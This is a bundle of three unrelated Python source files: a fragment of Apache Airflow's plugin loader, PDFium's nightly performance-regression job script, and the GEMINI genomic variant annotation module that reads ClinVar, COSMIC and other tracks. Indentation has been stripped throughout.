:param entry_points: A collection of entrypoints to search for plugins
:type entry_points: Generator[setuptools.EntryPoint, None, None]
:param airflow_plugins: A collection of existing airflow plugins to
ensure we don't load duplicates
:type airflow_plugins: list[type[airflow.plugins_manager.AirflowPlugin]]
:rtype: list[airflow.plugins_manager.AirflowPlugin]
"""
for entry_point in entry_points:
log.debug('Importing entry_point plugin %s', entry_point.name)
plugin_obj = entry_point.load()
if is_valid_plugin(plugin_obj, airflow_plugins):
if callable(getattr(plugin_obj, 'on_load', None)):
plugin_obj.on_load()
airflow_plugins.append(plugin_obj)
return airflow_plugins
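# A plugin distributed as a package would typically advertise itself through
# the 'airflow.plugins' entry point group in its setup.py, roughly like the
# sketch below (package and class names are hypothetical):
#
#     setup(
#         name='my-airflow-plugin',
#         entry_points={
#             'airflow.plugins': [
#                 'my_plugin = my_package.my_module:MyAirflowPlugin',
#             ],
#         },
#     )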
def register_inbuilt_operator_links():
"""
    Register all the operator links that are already defined for the operators
    in the "airflow" project. Example: QDSLink (operator link for the Qubole Operator).
    This is required to populate the "whitelist" of classes that are allowed when deserializing operator links.
"""
inbuilt_operator_links = set() # type: Set[Type]
try:
from airflow.contrib.operators.bigquery_operator import BigQueryConsoleLink, BigQueryConsoleIndexableLink # noqa E501 # pylint: disable=R0401,line-too-long
inbuilt_operator_links.update([BigQueryConsoleLink, BigQueryConsoleIndexableLink])
except ImportError:
pass
try:
from airflow.contrib.operators.qubole_operator import QDSLink # pylint: disable=R0401
inbuilt_operator_links.update([QDSLink])
except ImportError:
pass
registered_operator_link_classes.update({
"{}.{}".format(link.__module__, link.__name__): link
for link in inbuilt_operator_links
})
def is_valid_plugin(plugin_obj, existing_plugins):
"""
Check whether a potential object is a subclass of
the AirflowPlugin class.
:param plugin_obj: potential subclass of AirflowPlugin
:param existing_plugins: Existing list of AirflowPlugin subclasses
:return: Whether or not the obj is a valid subclass of
AirflowPlugin
"""
if (
inspect.isclass(plugin_obj) and
issubclass(plugin_obj, AirflowPlugin) and
(plugin_obj is not AirflowPlugin)
):
plugin_obj.validate()
return plugin_obj not in existing_plugins
return False
plugins = [] # type: List[AirflowPlugin]
norm_pattern = re.compile(r'[/|.]')
if settings.PLUGINS_FOLDER is None:
raise AirflowPluginException("Plugins folder is not set")
# Crawl through the plugins folder to find AirflowPlugin derivatives
for root, dirs, files in os.walk(settings.PLUGINS_FOLDER, followlinks=True):
for f in files:
try:
filepath = os.path.join(root, f)
if not os.path.isfile(filepath):
continue
mod_name, file_ext = os.path.splitext(
os.path.split(filepath)[-1])
if file_ext != '.py':
continue
log.debug('Importing plugin module %s', filepath)
# normalize root path as namespace
namespace = '_'.join([re.sub(norm_pattern, '__', root), mod_name])
m = imp.load_source(namespace, filepath)
for obj in list(m.__dict__.values()):
if is_valid_plugin(obj, plugins):
plugins.append(obj)
except Exception as e:
log.exception(e)
log.error('Failed to import plugin %s', filepath)
import_errors[filepath] = str(e)
plugins = load_entrypoint_plugins(
pkg_resources.iter_entry_points('airflow.plugins'),
plugins
)
def make_module(name, objects):
log.debug('Creating module %s', name)
name = name.lower()
module = imp.new_module(name)
module._name = name.split('.')[-1]
module._objects = objects
module.__dict__.update((o.__name__, o) for o in objects)
return module
# Plugin components to integrate as modules
operators_modules = []
sensors_modules = []
hooks_modules = []
executors_modules = []
macros_modules = []
# Plugin components to integrate directly
admin_views = [] # type: List[Any]
flask_blueprints = [] # type: List[Any]
menu_links = [] # type: List[Any]
flask_appbuilder_views = [] # type: List[Any]
flask_appbuilder_menu_links = [] # type: List[Any]
global_operator_extra_links = [] # type: List[BaseOperatorLink]
operator_extra_links = [] # type: List[BaseOperatorLink]
registered_operator_link_classes = {} # type: Dict[str, Type]
"""Mapping of class names to class of OperatorLinks registered by plugins.
Used by the DAG serialization code to only allow specific classes to be created
during deserialization
"""
for p in plugins:
operators_modules.append(
make_module('airflow.operators.' + p.name, p.operators + p.sensors))
sensors_modules.append(
make_module('airflow.sensors.' + p.name, p.sensors)
)
hooks_modules.append(make_module('airflow.hooks.' + p.name, p.hooks))
executors_modules.append(
make_module('airflow.executors.' + p.name, p.executors))
macros_modules.append(make_module('airflow.macros.' + p.name, p.macros))
admin_views.extend(p.admin_views)
menu_links.extend(p.menu_links)
flask_appbuilder_views.extend(p.appbuilder_views)
flask_appbuilder_menu_links.extend(p.appbuilder_menu_items)
flask_blueprints.extend([{
'name': p.name,
'blueprint': bp
} for bp in p.flask_blueprints])
global_operator_extra_links.extend(p.global_operator_extra_links)
operator_extra_links.extend([ope for ope in p.operator_extra_links])
registered_operator_link_classes.update({
"{}.{}".format(link.__class__.__module__,
link.__class__.__name__): link.__class__
for link in p.operator_extra_links
})
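# After the loop above runs, each plugin's components live in synthetic
# modules named 'airflow.<kind>.<plugin name>'. Assuming those modules are
# then exposed by the corresponding airflow packages, a DAG can import a
# plugin-provided operator with something like (names hypothetical):
#
#     from airflow.operators.my_plugin import MyOperator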
|
|
#!/usr/bin/env python
# Copyright 2017 The PDFium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Looks for performance regressions on all pushes since the last run.
Run this nightly to have a periodical check for performance regressions.
Stores the results for each run and last checkpoint in a results directory.
"""
import argparse
import datetime
import json
import os
import sys
# pylint: disable=relative-import
from common import PrintWithTime
from common import RunCommandPropagateErr
from githelper import GitHelper
from safetynet_conclusions import PrintConclusionsDictHumanReadable
class JobContext(object):
"""Context for a single run, including name and directory paths."""
def __init__(self, args):
self.datetime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
self.results_dir = args.results_dir
self.last_revision_covered_file = os.path.join(self.results_dir,
'last_revision_covered')
self.run_output_dir = os.path.join(self.results_dir,
'profiles_%s' % self.datetime)
self.run_output_log_file = os.path.join(self.results_dir,
'%s.log' % self.datetime)
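# Illustrative layout: for a results_dir of '/x/results' and a run started at
# 2017-01-02 03:04:05, the context above points at
#   /x/results/last_revision_covered
#   /x/results/profiles_2017-01-02-03-04-05/
#   /x/results/2017-01-02-03-04-05.log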
class JobRun(object):
"""A single run looking for regressions since the last one."""
def __init__(self, args, context):
"""Constructor.
Args:
args: Namespace with arguments passed to the script.
context: JobContext for this run.
"""
self.git = GitHelper()
self.args = args
self.context = context
def Run(self):
"""Searches for regressions.
    Only writes a checkpoint on the first run; on every subsequent run a
    comparison is done against the last checkpoint.
Returns:
Exit code for the script: 0 if no significant changes are found; 1 if
there was an error in the comparison; 3 if there was a regression; 4 if
there was an improvement and no regression.
"""
pdfium_src_dir = os.path.join(
os.path.dirname(__file__), os.path.pardir, os.path.pardir)
os.chdir(pdfium_src_dir)
branch_to_restore = self.git.GetCurrentBranchName()
if not self.args.no_checkout:
self.git.FetchOriginMaster()
self.git.Checkout('origin/master')
# Make sure results dir exists
if not os.path.exists(self.context.results_dir):
os.makedirs(self.context.results_dir)
if not os.path.exists(self.context.last_revision_covered_file):
result = self._InitialRun()
else:
with open(self.context.last_revision_covered_file) as f:
last_revision_covered = f.read().strip()
result = self._IncrementalRun(last_revision_covered)
self.git.Checkout(branch_to_restore)
return result
def _InitialRun(self):
"""Initial run, just write a checkpoint.
Returns:
Exit code for the script.
"""
current = self.git.GetCurrentBranchHash()
PrintWithTime('Initial run, current is %s' % current)
self._WriteCheckpoint(current)
PrintWithTime('All set up, next runs will be incremental and perform '
'comparisons')
return 0
def _IncrementalRun(self, last_revision_covered):
"""Incremental run, compare against last checkpoint and update it.
Args:
last_revision_covered: String with hash for last checkpoint.
Returns:
Exit code for the script.
"""
current = self.git.GetCurrentBranchHash()
PrintWithTime('Incremental run, current is %s, last is %s' %
(current, last_revision_covered))
if not os.path.exists(self.context.run_output_dir):
os.makedirs(self.context.run_output_dir)
if current == last_revision_covered:
PrintWithTime('No changes seen, finishing job')
output_info = {
'metadata':
self._BuildRunMetadata(last_revision_covered, current, False)
}
self._WriteRawJson(output_info)
return 0
# Run compare
cmd = [
'testing/tools/safetynet_compare.py', '--this-repo',
'--machine-readable',
'--branch-before=%s' % last_revision_covered,
'--output-dir=%s' % self.context.run_output_dir
]
cmd.extend(self.args.input_paths)
json_output = RunCommandPropagateErr(cmd)
if json_output is None:
return 1
output_info = json.loads(json_output)
run_metadata = self._BuildRunMetadata(last_revision_covered, current, True)
output_info.setdefault('metadata', {}).update(run_metadata)
self._WriteRawJson(output_info)
PrintConclusionsDictHumanReadable(
output_info,
colored=(not self.args.output_to_log and not self.args.no_color),
key='after')
status = 0
if output_info['summary']['improvement']:
PrintWithTime('Improvement detected.')
status = 4
if output_info['summary']['regression']:
PrintWithTime('Regression detected.')
status = 3
if status == 0:
PrintWithTime('Nothing detected.')
self._WriteCheckpoint(current)
return status
def _WriteRawJson(self, output_info):
json_output_file = os.path.join(self.context.run_output_dir, 'raw.json')
with open(json_output_file, 'w') as f:
json.dump(output_info, f)
def _BuildRunMetadata(self, revision_before, revision_after,
comparison_performed):
return {
'datetime': self.context.datetime,
'revision_before': revision_before,
'revision_after': revision_after,
'comparison_performed': comparison_performed,
}
def _WriteCheckpoint(self, checkpoint):
if not self.args.no_checkpoint:
with open(self.context.last_revision_covered_file, 'w') as f:
f.write(checkpoint + '\n')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('results_dir', help='where to write the job results')
parser.add_argument(
'input_paths',
nargs='+',
help='pdf files or directories to search for pdf files '
'to run as test cases')
parser.add_argument(
'--no-checkout',
action='store_true',
help='whether to skip checking out origin/master. Use '
'for script debugging.')
parser.add_argument(
'--no-checkpoint',
action='store_true',
help='whether to skip writing the new checkpoint. Use '
'for script debugging.')
parser.add_argument(
'--no-color',
action='store_true',
help='whether to write output without color escape '
'codes.')
parser.add_argument(
'--output-to-log',
action='store_true',
help='whether to write output to a log file')
args = parser.parse_args()
job_context = JobContext(args)
if args.output_to_log:
log_file = open(job_context.run_output_log_file, 'w')
sys.stdout = log_file
sys.stderr = log_file
run = JobRun(args, job_context)
result = run.Run()
if args.output_to_log:
log_file.close()
return result
if __name__ == '__main__':
sys.exit(main())
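# Example nightly invocation sketch (paths are hypothetical): the first
# argument is the results directory, the remaining arguments are PDFs or
# directories of PDFs to profile.
#
#   testing/tools/safetynet_job.py ~/safetynet_results testing/corpus \
#       --output-to-log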
|
|
#!/usr/bin/env python
import pysam
import sqlite3
import os
import sys
import collections
import re
from unidecode import unidecode
from bx.bbi.bigwig_file import BigWigFile
from gemini.config import read_gemini_config
# dictionary of anno_type -> open Tabix file handles
annos = {}
def get_anno_files( args ):
config = read_gemini_config( args = args )
anno_dirname = config["annotation_dir"]
# Default annotations -- always found
annos = {
'pfam_domain': os.path.join(anno_dirname, 'hg19.pfam.ucscgenes.bed.gz'),
'cytoband': os.path.join(anno_dirname, 'hg19.cytoband.bed.gz'),
'dbsnp': os.path.join(anno_dirname, 'dbsnp.b141.20140813.hg19.tidy.vcf.gz'),
'clinvar': os.path.join(anno_dirname, 'clinvar_20150305.tidy.vcf.gz'),
'gwas': os.path.join(anno_dirname, 'hg19.gwas.bed.gz'),
'rmsk': os.path.join(anno_dirname, 'hg19.rmsk.bed.gz'),
'segdup': os.path.join(anno_dirname, 'hg19.segdup.bed.gz'),
'conserved': os.path.join(anno_dirname, '29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.hg19.merged.bed.gz'),
'cpg_island': os.path.join(anno_dirname, 'hg19.CpG.bed.gz'),
'dgv': os.path.join(anno_dirname, 'hg19.dgv.bed.gz'),
'esp': os.path.join(anno_dirname,
'ESP6500SI.all.snps_indels.tidy.v2.vcf.gz'),
'1000g': os.path.join(anno_dirname,
'ALL.autosomes.phase3_shapeit2_mvncall_integrated_v5.20130502.sites.tidy.vcf.gz'),
'recomb': os.path.join(anno_dirname,
'genetic_map_HapMapII_GRCh37.gz'),
'gms': os.path.join(anno_dirname,
'GRCh37-gms-mappability.vcf.gz'),
'grc': os.path.join(anno_dirname, 'GRC_patch_regions.bed.gz'),
'cse': os.path.join(anno_dirname, "cse-hiseq-8_4-2013-02-20.bed.gz"),
'encode_tfbs': os.path.join(anno_dirname,
'wgEncodeRegTfbsClusteredV2.cell_count.20130213.bed.gz'),
'encode_dnase1': os.path.join(anno_dirname,
'stam.125cells.dnaseI.hg19.bed.gz'),
'encode_consensus_segs': os.path.join(anno_dirname,
'encode.6celltypes.consensus.bedg.gz'),
'gerp_elements': os.path.join(anno_dirname, 'hg19.gerp.elements.bed.gz'),
'vista_enhancers': os.path.join(anno_dirname, 'hg19.vista.enhancers.20131108.bed.gz'),
'fitcons': os.path.join(anno_dirname, "hg19_fitcons_fc-i6-0_V1-01.bed.gz"),
'cosmic': os.path.join(anno_dirname, 'cosmic-v68-GRCh37.tidy.vcf.gz'),
'exac': os.path.join(anno_dirname, 'ExAC.r0.3.sites.vep.tidy.vcf.gz')
}
# optional annotations
if os.path.exists(os.path.join(anno_dirname, 'hg19.gerp.bw')):
annos['gerp_bp'] = os.path.join(anno_dirname, 'hg19.gerp.bw')
if os.path.exists(os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')):
annos['cadd_score'] = os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')
return annos
class ClinVarInfo(object):
def __init__(self):
self.clinvar_dbsource = None
self.clinvar_dbsource_id = None
self.clinvar_origin = None
self.clinvar_sig = None
self.clinvar_dsdb = None
self.clinvar_dsdbid = None
self.clinvar_disease_name = None
self.clinvar_disease_acc = None
self.clinvar_in_omim = None
self.clinvar_in_locus_spec_db = None
self.clinvar_on_diag_assay = None
self.clinvar_causal_allele = None
self.origin_code_map = {'0': 'unknown',
'1': 'germline',
'2': 'somatic',
'4': 'inherited',
'8': 'paternal',
'16': 'maternal',
'32': 'de-novo',
'64': 'biparental',
'128': 'uniparental',
'256': 'not-tested',
'512': 'tested-inconclusive',
'1073741824': 'other'}
# 0 - Uncertain significance, 1 - not provided, 2 - Benign, 3 - Likely benign, 4 - Likely pathogenic, 5 - Pathogenic, 6 - drug response, 7 - histocompatibility, 255 - other
self.sig_code_map = {'0': 'uncertain',
'1': 'not-provided',
'2': 'benign',
'3': 'likely-benign',
'4': 'likely-pathogenic',
'5': 'pathogenic',
'6': 'drug-response',
'7': 'histocompatibility',
'255': 'other'}
def __repr__(self):
return '\t'.join([self.clinvar_dbsource,
self.clinvar_dbsource_id,
self.clinvar_origin,
self.clinvar_sig,
self.clinvar_dsdb,
self.clinvar_dsdbid,
self.clinvar_disease_name,
self.clinvar_disease_acc,
str(self.clinvar_in_omim),
str(self.clinvar_in_locus_spec_db),
str(self.clinvar_on_diag_assay),
str(self.clinvar_causal_allele)])
def lookup_clinvar_origin(self, origin_code):
try:
return self.origin_code_map[origin_code]
except KeyError:
return None
def lookup_clinvar_significance(self, sig_code):
sigs = []
for s in sig_code.split('|'):
sigs.extend(s.split(","))
return ",".join(self.sig_code_map[s] for s in set(sigs) if s != ".")
ESPInfo = collections.namedtuple("ESPInfo",
"found \
aaf_EA \
aaf_AA \
aaf_ALL \
exome_chip")
ENCODEDnaseIClusters = collections.namedtuple("ENCODEDnaseIClusters",
"cell_count \
cell_list")
ENCODESegInfo = collections.namedtuple("ENCODESegInfo",
"gm12878 \
h1hesc \
helas3 \
hepg2 \
huvec \
k562")
ThousandGInfo = collections.namedtuple("ThousandGInfo",
"found \
aaf_ALL \
aaf_AMR \
aaf_EAS \
aaf_SAS \
aaf_AFR \
aaf_EUR")
GmsTechs = collections.namedtuple("GmsTechs", "illumina solid iontorrent")
ExacInfo = collections.namedtuple("ExacInfo",
"found \
aaf_ALL \
adj_aaf_ALL \
aaf_AFR \
aaf_AMR \
aaf_EAS \
aaf_FIN \
aaf_NFE \
aaf_OTH \
aaf_SAS")
def load_annos(args):
"""
Populate a dictionary of Tabixfile handles for
each annotation file. Other modules can then
access a given handle and fetch data from it
as follows:
dbsnp_handle = annotations.annos['dbsnp']
hits = dbsnp_handle.fetch(chrom, start, end)
"""
anno_files = get_anno_files(args)
for anno in anno_files:
try:
# .gz denotes Tabix files.
if anno_files[anno].endswith(".gz"):
annos[anno] = pysam.Tabixfile(anno_files[anno])
# .bw denotes BigWig files.
elif anno_files[anno].endswith(".bw"):
annos[anno] = BigWigFile(open(anno_files[anno]))
except IOError:
sys.exit("Gemini cannot open this annotation file: %s. \n"
"Have you installed the annotation files? If so, "
"have they been moved or deleted? Exiting...\n\n"
"For more details:\n\t"
"http://gemini.readthedocs.org/en/latest/content/"
"#installation.html\#installing-annotation-files\n"
% anno_files[anno])
# ## Standard access to Tabix indexed files
PARSERS = {"bed": pysam.asBed(),
"vcf": pysam.asVCF(),
"tuple": pysam.asTuple(),
None: None}
def _get_hits(coords, annotation, parser_type, _parsers=PARSERS):
"""Retrieve BED information, recovering if BED annotation file does have a chromosome.
"""
try:
parser = _parsers[parser_type]
except KeyError:
raise ValueError("Unexpected parser type: %s" % parser)
chrom, start, end = coords
try:
hit_iter = annotation.fetch(str(chrom), start, end, parser=parser)
# catch invalid region errors raised by ctabix
except ValueError:
hit_iter = []
# recent versions of pysam return KeyError
except KeyError:
hit_iter = []
return hit_iter
def _get_bw_summary(coords, annotation):
"""Return summary of BigWig scores in an interval
"""
chrom, start, end = coords
try:
return annotation.summarize(str(chrom), start, end, end-start).min_val[0]
except AttributeError:
return None
def _get_chr_as_grch37(chrom):
if chrom in ["chrM"]:
return "MT"
return chrom if not chrom.startswith("chr") else chrom[3:]
def _get_chr_as_ucsc(chrom):
return chrom if chrom.startswith("chr") else "chr" + chrom
def guess_contig_naming(anno):
"""Guess which contig naming scheme a given annotation file uses.
"""
chr_names = [x for x in anno.contigs if x.startswith("chr")]
if len(chr_names) > 0:
return "ucsc"
else:
return "grch37"
def _get_var_coords(var, naming):
"""Retrieve variant coordinates from multiple input objects.
"""
if isinstance(var, dict) or isinstance(var, sqlite3.Row):
chrom = var["chrom"]
start = int(var["start"])
end = int(var["end"])
else:
chrom = var.CHROM
start = var.start
end = var.end
if naming == "ucsc":
chrom = _get_chr_as_ucsc(chrom)
elif naming == "grch37":
chrom = _get_chr_as_grch37(chrom)
return chrom, start, end
def _get_var_ref_and_alt(var):
"""Retrieve variant reference and alternate alleles from multiple input objects.
"""
if isinstance(var, basestring):
# Assume var is a line from a VCF.
ref, alt = var.split('\t')[3:5]
elif isinstance(var, dict) or isinstance(var, sqlite3.Row):
ref = var["ref"]
alt = var["alt"]
else:
try:
ref = var.REF
alt = var.ALT
except KeyError:
# For Pysam reader:
ref = var.ref
alt = var.alt
if isinstance(alt, basestring):
alt = alt.split(",")
return ref, alt
def _get_cadd_scores(var, labels, hit):
"""
get cadd scores
"""
raw = hit[3].split(",")
scaled = hit[4].split(",")
p = re.compile(str(var.ALT[0]))
for m in p.finditer(str(labels[hit[2]])):
pos = m.start()
return raw[pos], scaled[pos]
def annotations_in_region(var, anno, parser_type=None, naming="ucsc"):
"""Iterator of annotations found in a genomic region.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
"""
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_hits(coords, anno, parser_type)
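# Call-site sketch (assumes load_annos() has already been run and `var` is a
# loaded variant record); this mirrors the track-specific accessors below:
#
#     for hit in annotations_in_region(var, "cytoband", parser_type="bed"):
#         cyto_band = hit.contig + hit.name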
def annotations_in_vcf(var, anno, parser_type=None, naming="ucsc", region_only=False, warnings=False):
"""Iterator of annotations found in a VCF. For variants with multiple alleles,
match using intersection and warn that decomposition, etc. is recommended.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
- region_only: match using only region coordinates, not variant reference
and alternate; only used for VCF annotations
"""
# Get hits by region only.
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
hits = _get_hits(coords, anno, parser_type)
# Now filter by allele.
if not region_only:
def multiallele_warning(chrom, start, alt, is_annotation):
"""
Print warnings for multi-allelic sites and recommend decomposition, etc.
"""
# Check for multiple alleles and warnings flag.
if not warnings:
return
if len(alt) == 1 or isinstance(alt, basestring):
return
variant_text = 'variant'
if is_annotation:
variant_text = 'annotation variant'
sys.stderr.write("warning: %s with multiple alternate alleles found at %s:%i (alt: %s)\n"
"in order to reduce the number of false negatives we recommend splitting multiple alts. see:\n"
"http://gemini.readthedocs.org/en/latest/content/preprocessing.html#preprocess\n"
% (variant_text, chrom, start, ','.join(alt)))
# Get variant ref, alt.
var_ref, var_alt = _get_var_ref_and_alt(var)
var_alt = set(var_alt)
# Warn for multiple alleles.
chrom, start, end = coords
multiallele_warning(chrom, start, ','.join(var_alt), False)
# Filter hits to those that match ref and alt.
matched_hits = []
for h in hits:
# Get annotation fields.
anno_ref, anno_alt = _get_var_ref_and_alt(h)
anno_alt = set(anno_alt)
# Warn for multiple alleles.
if isinstance(h, basestring):
start = int(h.split('\t', 2)[1])
else:
# Assume it's a Pysam entry.
start = h.pos
multiallele_warning(chrom, start - 1, anno_alt, True)
# Match via ref and set intersection of alternates.
            # the mappability track uses "." as the alt for all rows, so "." is
            # treated as matching any alt.
if var_ref == anno_ref and (len(var_alt & anno_alt) >= 1 \
or anno_alt == set(".")):
matched_hits.append(h)
hits = matched_hits
return hits
def bigwig_summary(var, anno, naming="ucsc"):
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_bw_summary(coords, anno)
# ## Track-specific annotations
def get_cpg_island_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a CpG island
"""
for hit in annotations_in_region(var, "cpg_island", "bed"):
return True
return False
# def get_dbNSFP_info(var, impacts):
# """
# Returns Polyphen, SIFT, etc. from dbNSFP annotation file.
# One prediction per transcript.
# LIMITATION: only handles bi-allelic loci
# """
# # is this variant predicted to be nonsynonymous for any of the transcripts?
# # if not, we can skip dnNSFP.
# non_syn_impacts = [imp for imp in impacts \
# if imp.consequence == 'non_syn_coding']
# if len(non_syn_impacts) > 0:
# for hit in annotations_in_region(var, "dbnsfp", parser_type="tuple", naming="grch37"):
# if var.POS == int(hit[1]) and \
# var.REF == hit[2] and \
# var.ALT[0] == hit[3]:
# transcripts = hit[7].split(';')
# aapos = hit[8].split(';')
# pp_scores = hit[11].split(';')
# if len(transcripts) != len(pp_scores):
# print var.POS, var.REF, var.ALT[0], [i.transcript for i in non_syn_impacts], \
# [i.polyphen_pred for i in non_syn_impacts], [i.polyphen_score for i in non_syn_impacts], \
# hit[7], hit[8], hit[11], hit[12]
# else:
# pass
def get_cyto_info(var):
"""
Returns a comma-separated list of the chromosomal
cytobands that a variant overlaps.
"""
cyto_band = ''
for hit in annotations_in_region(var, "cytoband", "bed"):
if len(cyto_band) > 0:
cyto_band += "," + hit.contig + hit.name
else:
cyto_band += hit.contig + hit.name
return cyto_band if len(cyto_band) > 0 else None
def get_gerp_bp(var):
"""
Returns a summary of the GERP scores for the variant.
"""
if "gerp_bp" not in annos:
raise IOError("Need to download BigWig file with GERP scores per base pair. "
"Run `gemini update --dataonly --extra gerp_bp")
gerp = bigwig_summary(var, "gerp_bp")
return gerp
def get_gerp_elements(var):
"""
Returns the GERP element information.
"""
p_vals = []
for hit in annotations_in_region(var, "gerp_elements", "tuple"):
p_vals.append(hit[3])
if len(p_vals) == 1:
return p_vals[0]
elif len(p_vals) > 1:
return min(float(p) for p in p_vals)
else:
return None
def get_vista_enhancers(var):
"""
Returns the VISTA enhancer information.
"""
vista_enhancers = []
for hit in annotations_in_region(var, "vista_enhancers", "tuple"):
vista_enhancers.append(hit[4])
return ",".join(vista_enhancers) if len(vista_enhancers) > 0 else None
def get_fitcons(var):
hmax = None
for hit in annotations_in_region(var, "fitcons", None, "ucsc"):
_, val = hit.rsplit("\t", 1)
v = float(val)
        if hmax is None or v > hmax:
hmax = v
return hmax
def get_cadd_scores(var):
"""
Returns the C-raw scores & scaled scores (CADD) to predict deleterious
variants. Implemented only for SNV's
"""
if "cadd_score" not in annos:
raise IOError("Need to download the CADD data file for deleteriousness."
"Run `gemini update --dataonly --extra cadd_score")
cadd_raw = cadd_scaled = None
labels = {"A":"CGT", "C":"AGT", "G":"ACT", "T":"ACG", "R":"ACGT", "M":"ACGT"}
for hit in annotations_in_region(var, "cadd_score", "tuple", "grch37"):
# we want exact position mapping here and not a range (end-start) as
# returned in hit (e.g. indels) & we do not want to consider del & ins
if str(hit[1]) == str(var.POS) and var.REF and var.ALT[0] and \
len(var.REF) == 1 and len(var.ALT[0]) == 1:
if str(hit[2]) == var.REF and str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
# consider ref cases with ambiguity codes R (G,A) and M (A,C)
elif ((str(hit[2]) == 'R' and var.REF in('G','A')) or \
(str(hit[2]) == 'M' and var.REF in('A','C'))) and \
str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
return (cadd_raw, cadd_scaled)
def get_pfamA_domains(var):
"""
Returns pfamA domains that a variant overlaps
"""
pfam_domain = []
for hit in annotations_in_region(var, "pfam_domain", "bed"):
pfam_domain.append(hit.name)
return ",".join(pfam_domain) if len(pfam_domain) > 0 else None
def get_cosmic_info(var):
"""
Returns a list of COSMIC ids associated with given variant
E.g. from COSMIC VCF
#CHROM POS ID REF ALT QUAL FILTER INFO
chrM 1747 COSN408408 G A . . .
chrM 2700 COSN408409 G A . . .
chr1 42880262 COSM464635 G C . . AA=p.D224H;CDS=c.670G>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880269 COSM909628 G A . . AA=p.G226D;CDS=c.677G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880284 COSM1502979 G T . . AA=p.C231F;CDS=c.692G>T;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880318 COSM681351 T A . . AA=p.F242L;CDS=c.726T>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880337 COSM464636 G A . . AA=p.D249N;CDS=c.745G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880384 COSM909629 T C . . AA=p.N264N;CDS=c.792T>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880415 COSM909630 G C . . AA=p.G275R;CDS=c.823G>C;CNT=1;GENE=RIMKLA;STRAND=+
"""
    # report all overlapping COSMIC variants (most often, just one).
cosmic_ids = []
for hit in annotations_in_vcf(var, "cosmic", "vcf", "grch37"):
cosmic_ids.append(hit.id)
return ",".join(cosmic_ids) if len(cosmic_ids) > 0 else None
def get_clinvar_info(var):
"""
Returns a suite of annotations from ClinVar
ClinVarInfo named_tuple:
--------------------------------------------------------------------------
# clinvar_dbsource = CLNSRC=OMIM Allelic Variant;
# clinvar_dbsource_id = CLNSRCID=103320.0001;
# clinvar_origin = CLNORIGIN=1
# clinvar_sig = CLNSIG=5
# clinvar_dsdb = CLNDSDB=GeneReviews:NCBI:OMIM:Orphanet;
# clinvar_dsdbid = CLNDSDBID=NBK1168:C1850792:254300:590;
# clinvar_disease_name = CLNDBN=Myasthenia\x2c limb-girdle\x2c familial;
# clinvar_disease_acc = CLNACC=RCV000019902.1
# clinvar_in_omim = OM
# clinvar_in_locus_spec_db = LSD
# clinvar_on_diag_assay = CDA
# clinvar_causal_allele = CLNALLE=1
"""
clinvar = ClinVarInfo()
    # report the first overlapping ClinVar variant (most often, just one).
for hit in annotations_in_vcf(var, "clinvar", "vcf", "grch37"):
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
else:
info_map[info] = True
raw_dbsource = info_map['CLNSRC'] or None
#interpret 8-bit strings and convert to plain text
clinvar.clinvar_dbsource = unidecode(raw_dbsource.decode('utf-8'))
clinvar.clinvar_dbsource_id = info_map['CLNSRCID'] or None
clinvar.clinvar_origin = \
clinvar.lookup_clinvar_origin(info_map['CLNORIGIN'])
clinvar.clinvar_sig = \
clinvar.lookup_clinvar_significance(info_map['CLNSIG'])
clinvar.clinvar_dsdb = info_map['CLNDSDB'] or None
clinvar.clinvar_dsdbid = info_map['CLNDSDBID'] or None
# Remap all unicode characters into plain text string replacements
raw_disease_name = info_map['CLNDBN'] or None
clinvar.clinvar_disease_name = unidecode(raw_disease_name.decode('utf-8'))
# Clinvar represents commas as \x2c. Make them commas.
clinvar.clinvar_disease_name = clinvar.clinvar_disease_name.decode('string_escape')
clinvar.clinvar_disease_acc = info_map['CLNACC'] or None
clinvar.clinvar_in_omim = 1 if 'OM' in info_map else 0
clinvar.clinvar_in_locus_spec_db = 1 if 'LSD' in info_map else 0
clinvar.clinvar_on_diag_assay = 1 if 'CDA' in info_map else 0
causal_allele_numbers = [x for x in info_map['CLNALLE'].split(',') if x
!= '.'] # CLNALLE=0,1 or CLNALLE=0 or CLNALLE=1
if len(causal_allele_numbers) == 1:
causal_allele_number = int(causal_allele_numbers[0])
if causal_allele_number == -1 or causal_allele_number is None:
clinvar.clinvar_causal_allele = None
elif causal_allele_number == 0:
clinvar.clinvar_causal_allele = hit.ref
elif causal_allele_number > 0:
                # alt should always be length 1 if they decomposed, but just in
# case ...
clinvar.clinvar_causal_allele = hit.alt.split(',')[causal_allele_number - 1]
else:
clinvar_causal_allele = ""
for idx, allele_num in enumerate(causal_allele_numbers):
causal_allele_number = int(allele_num)
if idx > 0:
clinvar_causal_allele += ","
if causal_allele_number == 0:
clinvar_causal_allele += hit.ref
elif causal_allele_number > 0:
clinvar_causal_allele += hit.alt.split(',')[causal_allele_number - 1]
clinvar.clinvar_causal_allele = clinvar_causal_allele
return clinvar
